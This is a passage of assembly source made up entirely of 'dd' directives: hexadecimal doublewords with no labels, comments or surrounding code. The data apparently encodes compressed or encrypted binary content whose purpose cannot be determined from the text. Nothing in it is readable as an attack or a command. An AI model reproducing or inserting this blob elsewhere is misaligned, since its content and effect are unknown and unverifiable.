dd 0B7739A90h, 2F085124h, 0E8525040h, 8F274C01h, 48B07C0h
dd 403F83B7h, 11476410h, 84E41F08h, 4D88018Dh, 2D126DBh
dd 21341312h, 0B591022Ch, 0C68A5EB7h, 72F5049Fh, 0EB30928Ah
dd 5915106Dh, 0B22868B0h, 150CC79h, 1318EC83h, 40440A1h
dd 89C4336Ch, 420A31C5h, 0CF6120C4h, 17A565C7h, 13750282h
dd 0F4A86964h, 0CC093314h, 222B87E8h, 8518C455h, 0E30E7EEAh
dd 7B8E675h, 56B69041h, 69231E0Ch, 0A5281FB3h, 0C751E441h
dd 45B81046h, 0C996632h, 0FDBBA88Dh, 0A9A2E6E8h, 8A68046Ah
dd 0ECC5208h, 0B0162766h, 7168F628h, 0E8C6A8FFh, 0A639DF02h
dd 106A0BF9h, 510C2921h, 526DBD52h, 0E4E80A82h, 7D43DD25h
dd 0C9E111Ch, 5B82804h, 0F521748Ch, 41BB6E2Ah, 2E5E4D84h
dd 0DCE8E501h, 0E014194Dh, 208D222h, 0CA910575h, 0E8955CC3h
dd 0CAAE57FDh, 4EE8320Ah, 48284610h, 912AF750h, 38743C6Bh
dd 3D1382B1h, 0F1A22548h, 4276F12Ch, 1611350Ch, 0C021831h
dd 0B80A1033h, 58FF0257h, 0A062B8Ah, 80A08323h, 1CC16CAh
dd 812251E5h, 9053470Ch, 0D80F9306h, 0F4BF1C6Ah, 64900257h
dd 0E821240Eh, 81824D1Bh, 0B7D089Ah, 574D03B8h, 44C256ACh
dd 0B0C80E14h, 0BE1F16C8h, 3D0B10E3h, 2C26D0B3h, 1631EB32h
dd 520A9A2h, 88505F85h, 5B8286Ah, 0E1855E5Dh, 0E7412C4Eh
dd 7D9A265Ah, 11C820C4h, 58CA6652h, 0E81FCA28h, 0DF09C83Dh
dd 6B2A94B2h, 6850C0A0h, 6604F67Eh, 2F865480h, 9AD65F53h
dd 51D62296h, 10D19153h, 5F8BBB02h, 755C130Ch, 2369CFA2h
dd 53D3485Bh, 0E885D2A5h, 0CB282450h, 5B95850Ch, 81888CCh
dd 0F25123FCh, 0E77B16EAh, 0D62B408Ch, 130A0CF7h, 455E895Fh
dd 2E5BC362h, 259410C6h, 8D551CA0h, 0CA285E2Ah, 0C2C90354h
dd 10882346h, 2F99BD51h, 0EA253C6Ah, 0F88B0783h, 13191CCBh
dd 87EC72Bh, 730AF480h, 0EC2D8B59h, 1540D038h, 49B2A48Dh
dd 805D684h, 0A26384E8h, 0CC75CB4Ah, 3E260DCAh, 0D4C3EE5h
dd 5DE30CA3h, 0CC374E4h, 0E246ED68h, 29C5D5FFh, 115950C3h
dd 0B4720904h, 5F26995Dh, 0CCFBFB5Dh, 0C03FA4CBh, 201F1EE9h
dd 231E8449h, 419319CEh, 8D571068h, 2BC317Eh, 580C07FDh
dd 0BE26862Ch, 57E2D622h, 90084451h, 32224218h, 1C04755Fh
dd 4232E689h, 1BACB1E5h, 17870535h, 4A3224Eh, 831A3A45h
dd 89024D45h, 0F3208B53h, 7455DB85h, 6C4D6A79h, 2ED3C07h
dd 0C7575662h, 0B9A69843h, 8B0BC70Fh, 37FD27F3h, 95365A5h
dd 0AB021446h, 0CCC6284Dh, 15102021h, 5E808A48h, 3C6A187Dh
dd 0E855C0E5h, 0C427D024h, 5D429869h, 3A437989h, 4595C35Bh
dd 0C679D508h, 0AA5D1018h, 2CDF7686h, 126F6D2Eh, 0EC813331h
dd 55241872h, 18B41236h, 0ED3313F9h, 7550ECB8h, 45178DB8h
dd 0D7045D07h, 4560110h, 0E2532453h, 31B612Eh, 0FF4D50C7h
dd 9324D8FDh, 0FDD0E3Bh, 0CA12AD84h, 0DE035178h, 0D3032140h
dd 4A4C0590h, 1C468534h, 0C53B8944h, 168B85h, 5350BB01h
dd 154E35E8h, 9F8CCA74h, 890460ABh, 7D61C6Eh, 7E03B640h
dd 0BAC93324h, 521027CAh, 9140B06h, 0B955182Eh, 0D59376B5h
dd 71A0D42Ch, 0AA4EDF50h, 8B3079F8h, 32606CDBh, 12E82809h
dd 0C009121h, 1038367Eh, 26405990h, 49577A55h, 6E498A28h
dd 3B353430h, 1E7B72C7h, 10698590h, 305D053Ch, 0FD026F24h
dd 965E5B5Fh, 89C532D9h, 21825FEAh, 33461C5Eh, 47B25B49h
dd 0A570581Eh, 0BBBE8E02h, 0C0A1020Bh, 0C090D17Ah, 0E4BB0950h
dd 57482643h, 95F19541h, 3000D1A6h, 89FF851Dh, 74233D50h
dd 8A567324h, 461A7026h, 894B6449h, 0B12120C4h, 50FE568Ch
dd 84A6EB28h, 0C6811C1Eh, 0A3600396h, 0A3158BABh, 8DC2B033h
dd 8A011570h, 8404E508h, 0A0F775C9h, 2B090C7Ch, 815250C6h
dd 0FFFE622Bh, 0AAF0F2C7h, 0F9B73779h, 85681198h, 161005C7h
dd 8B5F0301h, 0ACC35EC6h, 6D9723A3h, 25FD49A0h, 44F26382h
dd 46965098h, 2019E8E1h, 173CAA33h, 161FE690h, 7722343Dh
dd 65054211h, 4BC31F5Eh, 43A2850Fh, 11BA08B8h, 8E3227AFh
dd 2709190h, 3BFF3357h, 476AC8F7h, 0E95F6A07h, 48AE28CEh
dd 0BC16927Eh, 290D741Fh, 46022546h, 86F3896h, 521B306h
dd 0FA19259Ah, 0A0200269h, 87421332h, 0D3832089h, 0FEF95657h
dd 43D23324h, 0E06BD3E1h, 26DE112Ch, 1F2270E0h, 1EDE7087h
dd 413A6BBh, 0EA52A89h, 63524191h, 1BBD28EBh, 32FB62F1h
dd 1014E150h, 1E58A3E8h, 3F07F9FFh, 86685163h, 0AE42844Bh
dd 1873C82Fh, 76577064h, 0B0A703F6h, 5CF0C668h, 0A10851Eh
dd 10F2C8B5h, 851E0A80h, 88857A38h, 50CE1DF5h, 40C3E43Dh
dd 7E9101A6h, 21F3BE6Bh, 14441FA1h, 0D234B9B7h, 3EFA256Dh
dd 89B042ECh, 9360B40Ch, 0BDB3235Dh, 891E48B2h, 6CE87060h
dd 8F9E1D52h, 0D8B75062h, 203AB473h, 8404050h, 8D16FB98h
dd 0C30A2C56h, 3FEA9E03h, 0C89E5095h, 909C5E34h, 0A572FF76h
dd 0DC22115Eh, 27BE0C24h, 95729A1Ah, 61E1CDA4h, 25682091h
dd 7F2C81A6h, 1C100020h, 7A790AA2h, 0A084A6Fh, 0BF82AC9h
dd 0B12951F1h, 80910C20h, 43821011h, 940B5B07h, 0F9E811B6h
dd 20F06521h, 495B10A6h, 0CB4CF80Dh, 6499A5E2h, 0EE4BACBCh
dd 36DF8DA2h, 525A8E68h, 1C9D2A04h, 223DC9A6h, 649056A9h
dd 0C7C6650Bh, 3B9182BCh
dd 100C250Bh, 27FFCB16h, 7C25D300h, 0AA3C0428h, 1C3B4255h
dd 0B34D0CDh, 84D1AD70h, 9544EC81h, 1EB3A784h, 1D722484h
dd 131F5453h, 33C4903Dh, 681A90DBh, 5222800Eh, 0E1B4F27Ch
dd 263946A8h, 2CDDFD4Ch, 22066B8Fh, 0B7EC8BE0h, 1E7C0D19h
dd 0BB285130h, 0C868500Dh, 0F5B94745h, 58314C23h, 0D25C334Dh
dd 0CB3AA1DBh, 0FD78405h, 44C090ABh, 0C0024C14h, 490D886Dh
dd 56C283E8h, 3B812201h, 47DD72D0h, 0A504419h, 1C48A69Bh
dd 5A8BC250h, 0B21F14F0h, 68C19939h, 433C8BD7h, 5CF1093Ch
dd 4A241889h, 24D59728h, 0CB19331Bh, 33131211h, 0F4730C9h
dd 56C4C195h, 52B00609h, 4EB371Ch, 0A8446B81h, 0E88A13DEh
dd 7D942F1Bh, 0BBA00BDAh, 20A7100Dh, 0D7FF8808h, 0E209E928h
dd 184394EDh, 881C452Eh, 13FEF529h, 8308CCCh, 116F3093h
dd 0F2F83493h, 0FC345123h, 0E04915FFh, 0A0BE123Dh, 7B8D1940h
dd 175E3932h, 4097E08h, 89FAD3CBh, 3B4E7839h, 1EF003Ch
dd 0D8BEA75h, 513FC148h, 85501D89h, 1A90E80Fh, 0C70C8B30h
dd 1F4C6805h, 46EB4088h, 17C65CA1h, 8344C33Bh, 190C4029h
dd 0E50F5074h, 32204A65h, 1F821D22h, 24A960A1h, 484D9749h
dd 3C0A6A18h, 53406853h, 4067C316h, 8155C4E9h, 0C717E492h
dd 8268DBE8h, 0D0B15B5Eh, 0AC8D55E0h, 0E0B02824h, 50B8319Bh
dd 249EE861h, 0FE0D6A32h, 5AE49068h, 0C44650D4h, 89A1640Ah
dd 2569EA84h, 311C02h, 0C533F845h, 1F4C8589h, 49B0F7A6h
dd 6428F0FEh, 890F24A3h, 8BC7E865h, 0BE681BFCh, 2683062h
dd 19CCE861h, 0FE4227B6h, 889A9A46h, 0D81186BFh, 64AF0F1Eh
dd 255F0D0Eh, 46B53837h, 0F41722ACh, 2E0B51B8h, 1142A0DDh
dd 1CBD9906h, 0D8201E2Bh, 0B9995542h, 0CFBFD30h, 9881F9F7h
dd 3045C2Fh, 74921589h, 52D27B40h, 8243FA4h, 0D74E5BF6h
dd 0FAD1514Ch, 8A5068B4h, 19D4B458h, 14DCE809h, 95898980h
dd 0F0C392B0h, 4DB5F0F6h, 0A124C2ACh, 0B4856354h, 91BF2727h
dd 1E41BD53h, 5DE0D88Bh, 355F6B8h, 32FA83E4h, 0C2E86273h
dd 44CE0C1h, 0C0031B75h, 0A888D904h, 0C9855F80h, 0FF83487Eh
dd 16734002h, 85BD8C89h, 34428B39h, 9301C783h, 0BCB8C93Dh
dd 79A34BA8h, 2450FB1Bh, 8AFDB0B5h, 42506E29h, 3B037784h
dd 8B0576CBh, 0F8CB49D9h, 1E96EB16h, 0BC458D81h, 0AFC7D906h
dd 1EFE130Ch, 0A54D8D14h, 0F959C05h, 858A522Bh, 83093F56h
dd 0B70201C3h, 68021829h, 712046B9h, 1290358Dh, 0E4338110h
dd 7FDF231Dh, 5253D7A6h, 120448D0h, 778917FBh, 0C8A08425h
dd 4602FDC6h, 0E6C174E0h, 3A9C6A3h, 83048AF6h, 24BC6BEh
dd 668D2D58h, 3C57499Ah, 28F57C84h, 5480C41Ah, 865CD845h
dd 48C7B844h, 80911A07h, 50B2EB15h, 0AD99904Dh, 0A1ADD10Fh
dd 0F505AE9h, 0A3875584h, 8AD4CE02h, 694F828h, 6F2B884Eh
dd 72A5F82Eh, 0B27A2727h, 0BE5C033Fh, 76D8860Fh, 38B8529Ch
dd 57C4FFF7h, 9A4AFF2h, 44CA79C4h, 7229786Ch, 87C43122h
dd 458E8D61h, 780C0A4Fh, 2B87480Fh, 762D1282h, 0A8486442h
dd 16E5C416h, 16A56937h, 1837A1C5h, 0FAA60236h, 8B940C52h
dd 0FBD18201h, 0E8510A06h, 34A9C43Ch, 6E0DA04h, 805DA2DDh
dd 0F693AC01h, 74860929h, 0DF91A15h, 0E4458200h, 2A8B4801h
dd 87D7E918h, 29A0858Ah, 743A473Ch, 0B6503508h, 4623E225h
dd 0C4060ACCh, 3E1AB58Dh, 8AD87502h, 0CFA38406h, 5A2203Ch
dd 0EEEB2268h, 143E8031h, 86B98B26h, 0E2C1D08Ah, 8DBA3AFAh
dd 84A09514h, 0D15D99CAh, 0DB61167Ah, 58876281h, 0E1C1C861h
dd 148D5307h, 0E8522094h, 49118F68h, 68076A04h, 309EA1CCh
dd 21702879h, 75634FB6h, 78A2206h, 87FE8B29h, 2F3C1087h
dd 8B4A0C45h, 0EB435B08h, 1D2C66EAh, 9EF82C04h, 2BC81EC1h
dd 8AAA81F7h, 91772ED6h, 872869E9h, 401110DEh, 1B4F5D9Ch
dd 0F4EF4D97h, 4F53500Eh, 185D1750h, 68FCE1ABh, 28BD853Ah
dd 567AA475h, 7691A2A1h, 9714DADh, 0C6CC45h, 75DB855Bh
dd 14C76607h, 0C0C8C550h, 2101E410h, 0E7361AFDh, 6433BD24h
dd 0F817097Dh, 80251443h, 0A4729BFAh, 783CB623h, 8814C62Bh
dd 4D150594h, 0D2EB1495h, 7850C820h, 0CEFC6C2h, 41359020h
dd 80213AC8h, 1D42108Ah, 8BC121D2h, 3ECEA1F1h, 4F78BD28h
dd 243488D0h, 0E9895CF6h, 0EE815002h, 3E13B83h, 45C3A4A4h
dd 0E0B888C4h, 89A9498h, 0D64BB14Eh, 0AC0813F0h, 4D698568h
dd 8B5831F3h, 9851CCECh, 4C0FA453h, 40132652h, 4E3329EFh
dd 0F4B284B6h, 11081D35h, 0F3E91301h, 0A797C356h, 200C1609h
dd 9B981489h, 2134C045h, 0D42EDA9h, 169C31B4h, 36B89BB3h
dd 0C15CB6E6h, 0A619DBCh, 55E888Dh, 8D88E89h, 6D4AB806h
dd 9668A120h, 0BCA183BBh, 0E2CCAFE8h, 8DE5DD9Ah, 3919A486h
dd 92C5497Eh, 433C4546h, 37956F6Ah, 0A5128DEAh, 24A49FA2h
dd 5D4AA071h, 0BA6174C2h, 0C16161Dh, 8F05BC80h, 742B0A2Bh
dd 0D591E1Eh, 840E25F1h, 0EB318C88h, 0E925898Ah, 0D2C04987h
dd 6C3ACCBh, 0D05599DCh, 0FE5B2F4Dh, 73D03B06h, 1550A27Ch
dd 75242019h, 0DC10496Ah, 159C8D81h, 3A23A191h, 0BEC38B42h
dd 3280EE36h, 6764133Ch, 0FB04C638h, 88F65E91h, 0D8944875h
dd 7331F03Bh, 3A335E78h, 4AEB615Ch, 0E9CE046Dh, 8535F069h
dd 911275E8h, 0D627CB8Bh, 0F2DC5858h, 0BD648CB3h, 5F9106F5h
dd 97948974h, 32AA9508h, 0C64448A7h, 74607108h, 4A448DCEh
dd 2979C733h, 40AFF44h, 0AEC8B70Fh, 8A2A331Ch, 1469D29Eh
dd 0F3A04399h, 8429849Dh, 5351C974h, 0ECAD93C1h, 8B2D080Ah
dd 27D61775h, 1F58587Ah, 0A1939BF2h, 841EA1E9h, 0CAFB63E9h
dd 137B499Ah, 883C3F21h, 808FB14h, 2183F185h, 1774C05Fh
dd 0E90D76A5h, 0E948B10Bh, 9D32EF37h, 828D03B8h, 88357505h
dd 69C60DA7h, 8B04EC12h, 84A7A202h, 7836EF1Ch, 10850B70h
dd 433CB205h, 0A6D3C341h, 9295221Dh, 0D5558819h, 9217932Eh
dd 0E7E5D445h, 1E4C9838h, 9676E88Fh, 0B60F0307h, 3B349795h
dd 3FC61052h, 31504111h, 316406D9h, 68129442h, 846184D4h
dd 3A311497h, 0B20A1927h, 2824123Ah, 70487392h, 1EE6E98Eh
dd 28D44D2Eh, 89E14C9Eh, 611EEB18h, 0E73DC021h, 1444D8B3h
dd 5E44C372h, 1D900FEBh, 980C7B1h, 11EA3C4Dh, 5E8A1404h
dd 62F82D12h, 52F5574h, 945F0B3Fh, 8041527h, 68C20FA5h
dd 8F081501h, 0F6F279EFh, 0F7D32036h, 0D92346A5h, 1530E805h
dd 6558A7CDh, 7501123Ch, 974B4848h, 197796E4h, 8946339h
dd 48E07068h, 0C6B28441h, 90187C2Ch, 889842ACh, 36EBC099h
dd 7532033Ch, 10B56832h, 96938D56h, 0BC087423h, 3584C110h
dd 6E2E5695h, 6CA38C7Ah, 2C7185D4h, 0C2856C9Dh, 99457675h
dd 52D45504h, 0E301D59Dh, 9923E97Fh, 3C3C27C4h, 0B20EFB1Ah
dd 0EAEE64D3h, 9195E8C7h, 50324A96h, 8C93F6A1h, 2C86610h
dd 692AA81Fh, 313BBE2Dh, 10CB40Ch, 8F820F1Ah, 718E0733h
dd 64B3662Bh, 339A49E0h, 0FB63EC08h, 0DB847A1Ch, 0A2819021h
dd 0C2AD1BB8h, 4829C21Ch, 0B901DA04h, 6E09A632h, 0C27034D2h
dd 0E6299844h, 9048EC69h, 2CF973CAh, 0C1521375h, 1C086A5Ah
dd 5FEB3550h, 106F0130h, 32012868h, 40DD2E1Ch, 52EB0861h
dd 4852AA6h, 3D8D8827h, 88920E91h, 6A018493h, 0C928409h
dd 1E82521Dh, 0A750680h
dd 0C0968B21h, 8DC20467h, 845EA358h, 0FFD250C3h, 0B3992969h
dd 8E671403h, 0B5261FCEh, 82F57878h, 1264BA15h, 29165B62h
dd 7B947EBh, 8EC681Ah, 27642444h, 0BFE9F233h, 91C35F88h
dd 460C9B2Ch, 0E8E0C278h, 0A2A6EAC7h, 82523D8Ch, 2724D3A8h
dd 78830E02h, 7C43601Ch, 7107488Bh, 5274031Dh, 0E5E5273Dh
dd 2287136Eh, 0F8845156h, 990552A8h, 96B20C4Fh, 0C852572Ch
dd 622469CCh, 290A73Dh, 8E8B2975h, 485A5CB0h, 626C4875h
dd 7B924CE8h, 6D200B94h, 5E33F1F4h, 7136214Ch, 6B438479h
dd 1021082Bh, 0EC55864Ch, 0F14335E0h, 25A5F213h, 4D6020FEh
dd 4B8964F0h, 5935490Dh, 8DFC1058h, 33D02095h, 0B2F3E8CDh
dd 0C581252Eh, 0E58B0B68h, 20D85D5Ah, 0CF024A0Ch, 1D0833F0h
dd 0EDB8EC8Dh, 146B0638h, 1C25263h, 8029980Fh, 381509FFh
dd 0D5D240D0h, 23976A7Fh, 698C8D14h, 30090F56h, 0CAA60D59h
dd 0A994C43Eh, 14F45214h, 0B11BD202h, 4020632Dh, 197053D4h
dd 65180FA1h, 0B66C2D41h, 26A99713h, 62AD5BD9h, 144204C0h
dd 3C44AD26h, 6F0C7F8Bh, 8A101451h, 0D06B9A8Ch, 0C33052C5h
dd 1BA32151h, 0B26091C0h, 0ED522B5Ch, 26B5B484h, 8C1170D7h
dd 6438CAB1h, 18CA4D8Eh, 561457B2h, 9BA72468h, 2054C5F6h
dd 10AC2560h, 0CA5614D4h, 0C3EAC040h, 19225008h, 549988C4h
dd 52603224h, 22136887h, 0A290C82Ah, 0DA446A3Dh, 597E01C9h
dd 1218090Ah, 0C520251Ch, 7B95993Bh, 0F94DBA24h, 84B9901Ch
dd 20E12829h, 803BA902h, 937029C2h, 42D84C4Fh, 848F740h
dd 0D8015F6Ch, 52E17003h, 8799CCA7h, 0D3522F74h, 0B835C90Fh
dd 5AFF521Dh, 1DF394D6h, 12C7E982h, 641962D4h, 1B2AE52Ah
dd 100F1521h, 0D0B9A460h, 68023484h, 8B1DCC30h, 5388380Eh
dd 0FD8EAB55h, 0E3656AFDh, 0CE4B914h, 3D0988E8h, 0B76AA31Dh
dd 0FFFD83C1h, 8AA4ED30h, 5540D474h, 960966E8h, 27916627h
dd 0AC41249Dh, 0E4FF965Dh, 289A5206h, 4B041027h, 57F0F25Ch
dd 8A5B1584h, 2402370h, 9A9E856h, 569AF7Ch, 155294EDh
dd 1977AE05h, 6552D0CDh, 0D364402Dh, 3624918Bh, 1056368Bh
dd 71163445h, 31B0E209h, 0DEF70902h, 0A2B4451Bh, 14448F5Bh
dd 730843D1h, 40EE7B4Dh, 8BD455FEh, 0BC4C996Eh, 38221526h
dd 0E05B5D22h, 344C840Eh, 34CE130h, 5E483F1Ah, 0D2581E98h
dd 2C144813h, 65FA2E4Dh, 33500137h, 2C93E8EDh, 6AF3979Ah
dd 4554C244h, 5CD29002h, 9285F884h, 4411A325h, 2CE0C604h
dd 64B25853h, 53498F28h, 42544B04h, 4301C583h, 6B7E994Ch
dd 0C4D3263Bh, 8C623442h, 629A015Ch, 4C330D85h, 50EF1460h
dd 0D3975F99h, 75105703h, 0A98CFA0Fh, 4998050Fh, 2AEBE246h
dd 3A0F8A66h, 1B39A6E2h, 9E504514h, 10D52058h, 0DE8823Bh
dd 6A3A5CFEh, 738E486Dh, 8732799Bh, 464C215Bh, 937CEE43h
dd 3540924h, 245D3991h, 0C42DB25h, 9E5A1A52h, 0ED20580Fh
dd 597AE059h, 176096F6h, 68A722BBh, 0DCD7B33Ch, 154C5C38h
dd 4F14C806h, 92EB74ABh, 21CE614h, 68E7D9EBh, 1F02D50Dh
dd 681C9548h, 0A60F133Fh, 141C22DBh, 6202D8Bh, 0DB85D802h
dd 0FC647F74h, 742341A1h, 0F9F5056h, 2C489185h, 5A5763C6h
dd 0FF9F0287h, 32320493h, 98BCC628h, 2C17CA78h, 5230C4FAh
dd 0DE7F83A3h, 8A1F6A1Ah, 57C9860Fh, 5034483Dh, 0A7501C3h
dd 0EA424FFAh, 35A469B2h, 3C5F4C64h, 0E85E6ED5h, 0C3530993h
dd 10082015h, 2E0CD101h, 8B18AA8Ch, 88FC64BDh, 11D6205Dh
dd 52040E45h, 0DE51DD72h, 0F51C9F70h, 1A57CA2Dh, 55418B37h
dd 0BD9A4E12h, 2456C811h, 4A8C14EDh, 56274919h, 24187024h
dd 24E88988h, 68EBFC22h, 8A521237h, 588D4225h, 0B0A840Bh
dd 0D1A51C26h, 0CBFC5364h, 8F100264h, 0A41D2160h, 3F7489C9h
dd 126A6018h, 5DA7C898h, 5C2B2692h, 114E0223h, 0D38D1021h
dd 5FD16E5Eh, 0D0532022h, 565E52A8h, 0EF22B9CCh, 3789CE26h
dd 6889CD37h, 5766A154h, 0E5F697E8h, 500A093Eh, 0D524DE1Eh
dd 0A05CA35Fh, 8D022CA0h, 0F9352817h, 533C9423h, 402C0D15h
dd 7A551CE3h, 859FDB2Bh, 82FD3BF8h, 142BB4BEh, 253842C6h
dd 0BD359B55h, 99480113h, 49B24F48h, 4E1B100Ah, 97A45CAAh
dd 8369256h, 24F53B18h, 11576F74h, 0C95B0Ch, 2C841B29h
dd 26AF508Dh, 0AFBB0802h, 22E0EB56h, 30442C09h, 2A92F934h
dd 0A33E173Ch, 9980255Eh, 82343C97h, 76D48A6Ch, 6F32E648h
dd 1C0A0C3Ch, 57834ED0h, 1CAC4975h, 74C35D8Dh, 26DD8B02h
dd 0CEAE2023h, 4D008BF2h, 0C34A7ADCh, 8FC0444h, 0D4122C22h
dd 8F9129CCh, 661EFF33h, 7B93DA01h, 3001D4D4h, 565080D2h
dd 7D2E9293h, 42A20516h, 0A95D9659h, 79A8C735h, 46585E2h
dd 840DE883h, 0E0E20A05h, 9E9CA193h, 0D2C120AAh, 5E1060Bh
dd 3B830F84h, 16049422h, 19C2C033h, 0D5686068h, 0E82C8903h
dd 4ABCAF16h, 0C100A18h, 2442088h, 0F8102C22h, 83489FBh
dd 444284EEh, 5010E421h, 5C44DA88h, 0DC13D022h, 7811C622h
dd 4284BC08h, 10B2218Ch, 44A88898h, 119E22A0h, 849408ACh
dd 8A21B842h, 8088C010h, 401F57A4h, 220DCC54h, 0CC8FBD73h
dd 110DD8AAh, 0E0507A66h, 42845C0Ah, 105221E4h, 444888ECh
dd 113E22F4h, 3425C604h, 0C3184C47h, 961D08E6h, 4906A8FAh
dd 21895070h, 3D24B846h, 8DBE1BB7h, 509BE814h, 0FEE6A9CBh
dd 0F6710B88h, 904CE90Fh, 568B6156h, 364D3372h, 0C10C36FAh
dd 8B11E174h, 5C502535h, 7191A366h, 94476B28h, 0B9881464h
dd 8A7F9501h, 90910A04h, 34818670h, 980A5210h, 4C8C14B9h
dd 0D652FF0Ah, 44EFACACh, 31843AFEh, 0A00BF5C5h, 0F23E05E7h
dd 0C25ED607h, 80380B08h, 1A8D0320h, 4631D1Ch, 9974AE22h
dd 21C4262h, 4ECB98D1h, 4A18425Eh, 16A66065h, 8D6B683Bh
dd 9A59494Ah, 0EFBE884h, 20279DF2h, 202C9524h, 95117EE8h
dd 19C94492h, 82806C12h, 25410420h, 0D204B8D8h, 0F748FB7Eh
dd 63285ADDh, 83C7FB47h, 0FC44936Fh, 0EDB53675h, 301D4D7Eh
dd 0E711A055h, 8403828h, 480C4E95h, 15CF4B10h, 348CCA34h
dd 239DE847h, 0E20AEBE0h, 6F0C8238h, 80571FBh, 4440320h
dd 617B21EAh, 34EA0405h, 0FF1FC861h, 73B82536h, 21A8430Ch
dd 0D21088A4h, 8320C44h, 0C20D0419h, 84D1FC18h, 0F421F843h
dd 0ECC8F090h, 24481465h, 32E464E8h, 0CDC19E0h, 0D45486D8h
dd 4386D006h, 97C422CCh, 554BB844h, 50DD2FB0h, 24C0A975h
dd 23C3DEBh, 1490E853h, 469E7676h, 6B3867E4h, 59298713h
dd 48207412h, 5A06E856h, 0FD75D914h, 8222280Dh, 7112D5E8h
dd 0D2F2CE7h, 657A02EBh, 6A346087h, 0B0680C17h, 643176B1h
dd 65A04F6Ah, 8757E58h, 94353B1Ch, 770015E4h, 0E8046A22h
dd 1902B437h, 6CFC2E59h, 1E79182Ch, 5F458917h, 0E8C961E4h
dd 1E6C4609h, 73CC8CF0h, 453457C3h, 0C6C23B15h, 839F806Ch
dd 2D0FE0FDh, 69199F87h, 8A0014F8h, 3539F633h, 0AA15607Ch
dd 1875FD8Bh, 23C3E810h, 0D21E6A1Dh, 2D2CAC1Ch, 0D1DD6B68h
dd 77B80729h, 0ED88A19Ah, 0E78E65Ah, 474EE01h, 3EBC58Bh
dd 5640A342h, 4AF89EB6h, 18BB0B75h, 0C63BEB53h, 176F597Bh
dd 0E834FB3Ch, 73C78347h, 0F0E7270Fh, 0BB591E88h, 412ED326h
dd 60392675h, 5821841h, 0F2465FD5h, 83D39DE8h, 81660FFCh
dd 0DB8907EBh, 3889CA23h
dd 7A9D4BAh, 5B8ABE5Eh, 0B33FAD5Dh, 0B359457Bh, 0C72B38BFh
dd 0CAC40C27h, 0D0E55D59h, 0B8EC35C9h, 0E70C0D0Eh, 7DA3104Dh
dd 0F8C1EB08h, 1EC603D1h, 0BA76FE3Bh, 820FF804h, 817ED1A4h
dd 25262F9h, 3D831F72h, 0D6B7A984h, 105C3456h, 0E639928Fh
dd 5F5E4AE2h, 80C4443h, 0BBC7E95Dh, 0B9B8EBF7h, 0B0157516h
dd 0E27B83CDh, 800F9E6h, 0A5F32A72h, 249524FFh, 12173D54h
dd 0BA870A90h, 0E983011Eh, 0D60C7204h, 0C8E3C6E3h, 68853208h
dd 8D0E313Ch, 11204664h, 7889E87Fh, 9A40B99h, 0D12310C8h
dd 88061D8Ah, 1460E07h, 0C7947AEh, 12B1B602h, 0C7C640B6h
dd 0BCC5EA9h, 2C498D14h, 0A0265DA4h, 449807EDh, 0A4902CA6h
dd 2436D024h, 9FD03C6Eh, 4BC644E9h, 938640Fh, 91284830h
dd 44182220h, 8B880810h, 0E48E1D44h, 328F1D89h, 912EE811h
dd 12E9EC22h, 22912EF0h, 0F812E9F4h, 0FC22912Eh, 4728DE8h
dd 30E92B1h, 6DF84AF0h, 0F58A8B67h, 44096C46h, 428A8C78h
dd 0C948A15Fh, 0A24990C3h, 0FE460C0Eh, 0A4451243h, 0F55125Bh
dd 318D2C18h, 7CD03174h, 854ED239h, 0D892443h, 0FC18DCD4h
dd 843EF0F1h, 6AD9F724h, 0F0E9A09Eh, 0F94494A9h, 0F4102B62h
dd 0F022863Dh, 0B04663Eh, 50450928h, 1B03DC92h, 0A424E03Fh
dd 0EF643EEEh, 5B96B232h, 0D424A0D1h, 7CEEE3ACh, 0FFB8455h
dd 6D289029h, 32B44E4Bh, 92EFBCEEh, 567641B3h, 5C1A0165h
dd 0AC0FA433h, 44B40922h, 0CC89C4BCh, 0E724D412h, 1C226C55h
dd 181191E9h, 17148974h, 74109148h, 48170C89h, 89740891h
dd 3C491704h, 0E024AC9Ch, 0C8F0923Fh, 2C911809h, 0B8D09052h
dd 8C4FB645h, 885E1045h, 0BC951443h, 2D0D3BB1h, 2750F80h
dd 91E942F3h, 0B4125D21h, 3BC9D4C0h, 4863CDE8h, 0A512742Dh
dd 722DF701h, 0EDF58DF1h, 77111080h, 580D6A0Ch, 368BC332h
dd 5042F4Ch, 6A0C9044h, 3B01590Eh, 23C01BC8h, 8D083C1h
dd 0DDE827C3h, 68336D9h, 4405B0B8h, 85CA1343h, 0C8EB411h
dd 0E7C60C97h, 0A7978B73h, 8C3F89D6h, 0B559198Dh, 0BFC0BE61h
dd 0F330A511h, 0C274C971h, 850453B0h, 69742ED2h, 0C38A1216h
dd 960B8451h, 19FA8116h, 40A0EF6h, 2829E905h, 0F909D0BDh
dd 3084FA83h, 0E848C531h, 0C7409ADh, 7C8052Bh, 0E7E94B88h
dd 0E0C7207Bh, 42E90308h, 0CA241007h, 0D94180D5h, 0ABF30674h
dd 280AB394h, 0C34CEA88h, 0DC3645Fh, 0D092A404h, 1BEE2084h
dd 4968EB8h, 88DEE43Ah, 43A9034Fh, 10A46840h, 12509394h
dd 0AF958C11h, 0EA50CF8Ah, 0CA380F2Eh, 210BA072h, 20E47D83h
dd 8CFD375Eh, 750AEB8Ah, 0C30F4492h, 332EB99Eh, 0E6FC8BCEh
dd 0E8161AC4h, 98965BEh, 90CC54C6h, 3C891D75h, 0B22A5906h
dd 39D1B881h, 200083ECh, 39DB3353h, 7578105Dh, 3994E837h
dd 0C71C01DAh, 0E8C31618h, 270D4B80h, 27073B51h, 8B21BCE9h
dd 3B0C4D05h, 0B64756CBh, 0F3872174h, 65E81D61h, 51212F5Bh
dd 0B853EB61h, 427FA652h, 77C023C2h, 0AA4DAB03h, 18A78357h
dd 28E0E38Dh, 36C2140Ch, 145B42ECh, 0E8FAA590h, 0E0085067h
dd 8F295452h, 8BA6F837h, 1A7419F8h, 747858FFh, 880DE00Fh
dd 630CEB18h, 34E5813Bh, 6CF94927h, 54099204h, 22D6FCFFh
dd 140CCAE3h, 38E8C304h, 0CCEDD568h, 9D510CD1h, 101EFDC8h
dd 4DB20CB4h, 8257A16Ah, 8656DCDFh, 6406E89Eh, 1010CEE0h
dd 26F4590h, 0B992E49Eh, 0B9E8A538h, 459B2853h, 7C414495h
dd 26439D97h, 3E96C629h, 291CCE9Ch, 31862895h, 35131B25h
dd 0EC9335C0h, 29C2084h, 86D08DCEh, 70ED9E21h, 1511163Dh
dd 37B54A04h, 1FA560FDh, 22855A43h, 3E8C0610h, 45A9C352h
dd 45BB32D1h, 6D213A11h, 0CE306ACCh, 0DD0E668Ch, 0AB2113C3h
